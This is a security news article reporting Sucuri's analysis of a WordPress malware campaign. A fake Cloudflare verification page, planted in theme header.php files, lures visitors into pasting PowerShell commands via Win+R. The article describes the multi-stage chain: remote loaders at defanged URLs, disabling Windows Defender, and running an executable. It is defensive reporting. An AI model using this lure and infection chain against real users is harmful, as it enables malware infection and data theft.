Ddos 
A new wave of deceptive attacks is weaponizing the trusted Cloudflare brand to deliver Windows-based malware through compromised WordPress themes and plugins.
Security researchers at Sucuri have uncovered a fresh strain of malware that masquerades as a legitimate Cloudflare human verification page—tricking unsuspecting site visitors into executing malicious PowerShell commands. The campaign, analyzed by Kayleigh Martin, Security Analyst at Sucuri, marks an evolution in tactics used by threat actors to target WordPress environments and compromise end users.
“This style of malware is not new,” Martin explains, “but the difference between this new infection and previous ones is the location of where the malware is located – spread out among multiple themes and fake plugins.”
At the main of the attack is a convincing clone of the Cloudflare verification screen, complete with a human verification checkbox and a fabricated warning about “unusual web traffic.” Once the user is lulled into a false sense of security, the page instructs them to:
- Press Win + R to open the Windows Run dialog,
- Paste a command,
- Execute it to supposedly complete the verification process.
In reality, this sequence launches a multi-stage infection. The first stage leverages a hidden <textarea> that triggers an obfuscated PowerShell script. This script escalates privileges and fetches a second-stage loader from a remote domain: https://workaem[.]eth[.]limo/x.txt.
The payload retrieved is itself encoded in base64 and designed to build a third URL: https://workaem[.]eth[.]limo/load.txt.
“The downloaded file, load.txt, contains a base64-encoded PowerShell payload,” Martin notes. “It downloads a ZIP file, extracts a Windows executable (test.exe), disables Windows Defender protections, and executes the malware.”
While the final executable was not available for analysis, the infection chain and behavior align with previously observed infostealers and remote access trojans.
The malicious scripts are deeply embedded in header.php files of multiple active and inactive WordPress themes. This tactic ensures widespread infection across the site and makes removal more challenging, especially if administrators overlook inactive themes or plugins.
“Because all themes are affected, removal can be challenging, and the infection may easily evade detection,” warns Martin.
The use of legitimate-looking design elements and official Cloudflare branding further increases the success rate of this campaign, particularly among users with limited technical awareness.
Perhaps the most dangerous element of the infection is its manipulation of system-level tools. Martin emphasizes:
“Website visitors should never run commands using Win + R just because a website tells them to. Legitimate websites will never ask you to do this.”
Running commands from untrusted sources—especially with administrative privileges—can lead to severe consequences, including data theft, malware infection, and system compromise.
Donate